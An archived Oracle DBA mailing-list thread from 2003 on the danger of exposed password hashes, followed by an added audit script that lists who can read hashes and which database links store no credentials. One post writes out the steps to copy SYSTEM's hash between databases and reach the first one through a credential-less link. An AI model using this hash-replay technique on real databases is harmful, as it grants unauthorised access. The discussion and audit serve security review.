
Re: Risk of knowing password hash value (Was: OEM permissions)

From: Jared Still <jkstill_at_cybcon.com>
Date: Mon, 22 Dec 2003 20:59:25 -0800
Message-ID: <F001.005DAAA5.20031222205925@fatcity.com>

It doesn't matter which account I logged into DB2 with, as long as that account has privileges to read DBA_USERS.

SYSTEM was used simply because it was the only account on the database that could be logged into remotely, so my test could be run without switching between machines.

If I had granted SELECT_CATALOG_ROLE to scott, I could have logged in as SCOTT and done the same.

Jared

PS. Forgot this in private post to Yong: The password is cached, I assume in the PGA. This doesn't work without reconnecting. Logging out isn't strictly necessary, but the way my shell is set up, it takes quite a few less keystrokes to logout/logon than to type 'connect system/password@db2'.

On Mon, 2003-12-22 at 20:19, Yong Huang wrote:
> Jared,
>
> I see you log out and log back in as SYSTEM to DB2. But how do you know the
> password for SYSTEM to log back in with after you change it?
>
> What if you don't log out? When I tried that (i.e. not logging out), I got
> ORA-1017.
>
> Yong Huang
>
> --- Jared Still <jkstill_at_cybcon.com> wrote:
> > Environment:
> >
> > DB1: RH 8.0 with Oracle EE 9.2.0.4
> >
> > DB2: Win2k SP3 with Oracle EE 9.2.0.1
> >
> > SYSTEM users on each database initially have different passwords.
> >
> > It goes something like this:
> >
> > DB1:
> >
> > select password from dba_users where username = 'SYSTEM';
> >
> > Let's say the result is 'AC424SDK4398'
> >
> > DB2:
> >
> > Logon to DB2 as SYSTEM.
> >
> > alter user SYSTEM identified by values 'AC424SDK4398';
> > create database link systemlink using 'DB1';
> >
> > Logout, and log back on to DB2 as SYSTEM.
> >
> > select count(*) from v$session@systemlink;
> >
> > Works for me in this environment. DB2 is compromised.
> >
> > HTH
> >
> > Jared
> >
> >
> >
> > On Mon, 2003-12-22 at 08:29, Yong Huang wrote:
> >
> > > Hi, Gregory,
> > >
> > > I only have access to Oracle 9.2 on my laptop. Here's my test. I have ORCL and
> > > AUX1 databases, the latter created by RMAN DUPLICATE some time ago. I logon
> > > AUX1 as SYSTEM. Set SYSTEM password hash value to the same as in ORCL. Create
> > > link L to ORCL without password. Selecting from a table in ORCL @L (i.e. select
> > > * from yongtest@l) throws ORA-1017 invalid username/password.
> > >
> > > Alternatively, I logon as SYS and create a procedure owned by SYSTEM, with one
> > > line execute immediate('select count(*) from yongtest@l'). When I execute
> > > system.<this procedure> as SYS, I get ORA-1005 null password given. (I could
> > > use DBMS_SYS_SQL but using the execute immediate trick obviates the need to
> > > remember the syntax in that undocumented package).
> > >
> > > If I use connect to current_user to create the link, I always get ORA-28030
> > > Server encountered problems accessing LDAP directory service.
> > >
> > > Could you try on your databases and show how you do it? As I said, this may be
> > > a security problem. I'm just too ignorant of it and can't reproduce it for now.
> > > Yong Huang
> > >
> > > Norris, Gregory T [ITS] wrote:
> > >
> > > There's no reason I can see that he couldn't create the dblink first, and then
> > > reset the password using the encrypted value. Alternately, the dblink could be
> > > created using the DBMS_SYS_SQL package... no knowledge of the current password
> > > required.
> > >
> > > create database link foo
> > > connect to current_user
> > > using 'bar';
>
> --
> Please see the official ORACLE-L FAQ: http://www.orafaq.net
> --
> Author: Yong Huang
> INET: yong321_at_yahoo.com
>
> Fat City Network Services -- 858-538-5051 http://www.fatcity.com
> San Diego, California -- Mailing list and web hosting services
> ---------------------------------------------------------------------
> To REMOVE yourself from this mailing list, send an E-Mail message
> to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
> the message BODY, include a line containing: UNSUB ORACLE-L
> (or the name of mailing list you want to be removed from). You may
> also send the HELP command for other information (like subscribing).
>

-- 
Please see the official ORACLE-L FAQ: http://www.orafaq.net
-- 
Author: Jared Still
  INET: jkstill_at_cybcon.com

Received on Mon Dec 22 2003 - 22:59:25 CST
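
An audit for the two conditions this thread relies on, read access to the PASSWORD column of DBA_USERS and database links created without stored credentials, added here as an example and not part of the original messages. It uses the standard data dictionary views and assumes a DBA-privileged session; it also assumes that a link created as in the thread (no CONNECT TO clause) is listed with a NULL USERNAME in DBA_DB_LINKS.

```sql
-- 1. Users or roles with a direct path to the stored password hash:
--    SELECT on DBA_USERS or SYS.USER$, or the SELECT ANY DICTIONARY privilege.
SELECT grantee, 'SELECT on SYS.' || table_name AS path
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name IN ('DBA_USERS', 'USER$')
   AND privilege = 'SELECT'
UNION ALL
SELECT grantee, privilege
  FROM dba_sys_privs
 WHERE privilege = 'SELECT ANY DICTIONARY'
 ORDER BY 1;

-- 2. Everyone who inherits one of those paths through a chain of role grants
--    (for example SCOTT after being granted SELECT_CATALOG_ROLE).
--    ROLE_CHAIN shows the roles walked, starting from the one holding the grant.
SELECT grantee,
       LEVEL AS depth,
       SYS_CONNECT_BY_PATH(granted_role, '/') AS role_chain
  FROM dba_role_privs
 START WITH granted_role IN (
         SELECT grantee
           FROM dba_tab_privs
          WHERE owner = 'SYS'
            AND table_name IN ('DBA_USERS', 'USER$')
            AND privilege = 'SELECT'
         UNION
         SELECT grantee
           FROM dba_sys_privs
          WHERE privilege = 'SELECT ANY DICTIONARY')
CONNECT BY PRIOR grantee = granted_role
 ORDER BY grantee, depth;

-- 3. Database links with no stored credentials. These connect to the remote
--    database as whoever is logged on locally, which is the kind of link
--    created in the thread with: create database link systemlink using 'DB1';
SELECT owner, db_link, host, created
  FROM dba_db_links
 WHERE username IS NULL
 ORDER BY owner, db_link;
```

Grantees returned by queries 1 and 2 that are not DBA accounts are the ones to review first, since the thread shows that read access to the hash is all the test required.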
